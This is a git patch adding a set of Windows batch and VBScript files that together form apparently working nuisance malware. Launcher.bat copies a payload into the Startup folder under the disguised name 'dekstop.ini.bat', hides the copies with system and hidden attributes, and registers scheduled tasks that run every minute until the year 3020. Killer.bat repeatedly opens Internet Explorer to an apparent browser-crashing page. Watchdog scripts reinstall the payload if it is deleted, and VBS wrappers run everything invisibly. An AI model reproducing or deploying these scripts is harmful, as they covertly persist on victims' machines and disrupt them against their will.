From 4bd10da7aea68fb9a5126c117737360eacd30a71 Mon Sep 17 00:00:00 2001 From: Jonny Banana Date: Mon, 12 Aug 2019 02:29:42 +0200 Subject: [PATCH] Add files via upload --- Killer.bat | 5 +++++ Killer.vbs | 2 ++ Launcher.bat | 43 +++++++++++++++++++++++++++++++++++++++++++ Launcher.vbs | 2 ++ Quack_Control_NEW.bat | 14 ++++++++++++++ Quack_Control_NEW.vbs | 2 ++ Quack_Control_OLD.bat | 14 ++++++++++++++ Quack_Control_OLD.vbs | 2 ++ 8 files changed, 84 insertions(+) create mode 100644 Killer.bat create mode 100644 Killer.vbs create mode 100644 Launcher.bat create mode 100644 Launcher.vbs create mode 100644 Quack_Control_NEW.bat create mode 100644 Quack_Control_NEW.vbs create mode 100644 Quack_Control_OLD.bat create mode 100644 Quack_Control_OLD.vbs diff --git a/Killer.bat b/Killer.bat new file mode 100644 index 0000000..fcd03a4 --- /dev/null +++ b/Killer.bat @@ -0,0 +1,5 @@ +@ECHO OFF +color FE & mode con:cols=16 lines=1 +start cmd /c /MIN color 23&mode con:cols=16 lines=1&start iexplore https://jonnybanana.github.io/safari-ie-reaper.github.io + + diff --git a/Killer.vbs b/Killer.vbs new file mode 100644 index 0000000..025af9c --- /dev/null +++ b/Killer.vbs @@ -0,0 +1,2 @@ +Set objShell = WScript.CreateObject("WScript.Shell") +Return = objShell.Run("""%USERPROFILE%\Killer.bat""", 0, False) \ No newline at end of file diff --git a/Launcher.bat b/Launcher.bat new file mode 100644 index 0000000..1f89763 --- /dev/null +++ b/Launcher.bat @@ -0,0 +1,43 @@ +@ECHO OFF +color FE & mode con:cols=16 lines=1 + + +REM if this directory exist the system must be Vista or later +IF EXIST "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\" ( + +REM rename the file to dekstop.ini (not desktop.ini) + copy /Y Killer.bat "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\dekstop.ini.bat" + copy /Y Killer.bat "%USERPROFILE%\Killer.vbs" + copy /Y Killer.bat "%USERPROFILE%\Killer.bat" + copy /Y Quack_Control_OLD.bat "%USERPROFILE%\Quack_Control_OLD.bat" + + attrib +s +h "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\dekstop.ini.bat" + attrib +s +h /Y Killer.bat "%USERPROFILE%\Killer.bat" + attrib +s +h Quack_Control_OLD.bat "%USERPROFILE%\Quack_Control_OLD.bat" + attrib +s +h "%USERPROFILE%\Killer.vbs" + + schtasks /Create /SC MINUTE /MO 1 /ED 12/11/3020 /F /TN Quack /TR %AppData%\Microsoft\Windows\Start Menu\Programs\startup\dekstop.ini.bat + schtasks /Create /SC DAILY /MO 1 /ED 12/11/3020 /F /TN QuackControl /TR %USERPROFILE%\Quack_Control_NEW.vbs + + cmd.exe /c start /min "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\dekstop.ini.bat " & exit + + + +REM else the system must be Xp or earlier +) ELSE ( + + copy /Y Killer.bat "%UserProfile%\Start Menu\Startup\dekstop.ini.bat" + copy /Y Killer.bat "%USERPROFILE%\Killer.vbs" + copy /Y Killer.bat "%USERPROFILE%\Killer.bat" + copy /Y Quack_Control_OLD.bat "%USERPROFILE%\Quack_Control_OLD.bat" + + attrib +s +h "%UserProfile%\Start Menu\Startup\dekstop.ini.bat" + attrib +s +h /Y Killer.bat "%USERPROFILE%\Killer.bat" + attrib +s +h Quack_Control_OLD.bat "%USERPROFILE%\Quack_Control_NEW.bat" + attrib +s +h "%USERPROFILE%\Killer.vbs" + + schtasks /Create /SC MINUTE /MO 1 /ED 12/11/3020 /F /TN Quack /TR %AppData%\Microsoft\Windows\Start Menu\Programs\startup\dekstop.ini.bat + schtasks /Create /SC DAILY /MO 1 /ED 12/11/3020 /F /TN QuackControl /TR %USERPROFILE%\Quack_Control_OLD.vbs + + cmd.exe /c start /min "%UserProfile%\Start Menu\Startup\dekstop.ini.bat" & exit +) \ No newline at end of file diff --git a/Launcher.vbs b/Launcher.vbs new file mode 100644 index 0000000..dd30ddc --- /dev/null +++ b/Launcher.vbs @@ -0,0 +1,2 @@ +Set objShell = WScript.CreateObject("WScript.Shell") +Return = objShell.Run("""Launcher.bat""", 0, False) \ No newline at end of file diff --git a/Quack_Control_NEW.bat b/Quack_Control_NEW.bat new file mode 100644 index 0000000..129d336 --- /dev/null +++ b/Quack_Control_NEW.bat @@ -0,0 +1,14 @@ +@ECHO OFF +color FE & mode con:cols=16 lines=1 + + +IF EXIST "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\dekstop.ini.bat" ( + +REM a trick to make anithyng a.k.a little delay and exit + ping 127.0.0.1 -n 2 > nul + +) ELSE ( + + REM if the file not exist = deleted rename file from dekstop.ini.bat to Killer.bat + copy /Y Killer.bat "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\Killer.bat" + attrib +s +h "%AppData%\Microsoft\Windows\Start Menu\Programs\startup\Killer.bat" \ No newline at end of file diff --git a/Quack_Control_NEW.vbs b/Quack_Control_NEW.vbs new file mode 100644 index 0000000..3dd4122 --- /dev/null +++ b/Quack_Control_NEW.vbs @@ -0,0 +1,2 @@ +Set objShell = WScript.CreateObject("WScript.Shell") +Return = objShell.Run("""%USERPROFILE%\Quack_Control_NEW""", 0, False) \ No newline at end of file diff --git a/Quack_Control_OLD.bat b/Quack_Control_OLD.bat new file mode 100644 index 0000000..b25b110 --- /dev/null +++ b/Quack_Control_OLD.bat @@ -0,0 +1,14 @@ +@ECHO OFF +color FE & mode con:cols=16 lines=1 + + +IF EXIST "%UserProfile%\Start Menu\Startup\dekstop.ini.bat" ( + +REM a trick to make anithyng a.k.a little delay and exit + ping 127.0.0.1 -n 2 > nul + +) ELSE ( + + REM if the file not exist = deleted rename file from dekstop.ini.bat to Killer.bat + copy /Y Killer.bat "%UserProfile%\Start Menu\Startup\Killer.bat" + attrib +s +h "%UserProfile%\Start Menu\Startup\Killer.bat" \ No newline at end of file diff --git a/Quack_Control_OLD.vbs b/Quack_Control_OLD.vbs new file mode 100644 index 0000000..b9a1862 --- /dev/null +++ b/Quack_Control_OLD.vbs @@ -0,0 +1,2 @@ +Set objShell = WScript.CreateObject("WScript.Shell") +Return = objShell.Run("""%USERPROFILE%\Quack_Control_OLD""", 0, False) \ No newline at end of file